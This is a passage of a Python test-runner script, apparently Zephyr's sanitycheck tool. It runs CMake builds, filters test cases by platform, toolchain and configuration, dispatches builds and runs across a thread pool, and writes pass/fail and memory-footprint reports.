# A real error occurred; check the build log to tell a region overflow (skip) from a real build failure
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
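# Note on the flow below: process() consumes messages from the shared pipeline
# queue. A single test instance typically moves through the states
#   cmake -> build -> run -> report -> (optional) cleanup
# short-circuiting straight to "report" when cmake or the build fails, when the
# instance gets filtered out, or when --cmake-only is in effect.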
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process: call cmake and then build with the configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
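# Minimal usage sketch for BoundedExecutor (illustrative only; do_work and
# items are hypothetical names, not part of this script):
#
#   with BoundedExecutor(bound=20, max_workers=4) as executor:
#       futures = [executor.submit(do_work, item) for item in items]
#       concurrent.futures.wait(futures)
#
# submit() starts blocking once bound + max_workers items are in flight (that
# is how the semaphore above is sized), so the producer cannot flood the work
# queue faster than the workers drain it.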
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
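# Illustrative examples of lines matched by the patterns above:
#   CONFIG_FOO=y        -> ("CONFIG_FOO", "y")
#   CONFIG_BAR="baz"    -> ("CONFIG_BAR", "baz")
# dt_re matches the same KEY=VALUE shape without requiring the CONFIG_ prefix.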
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
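# relative change compared to the previous value (value - delta is the old metric)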
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch the next message from the pipeline queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
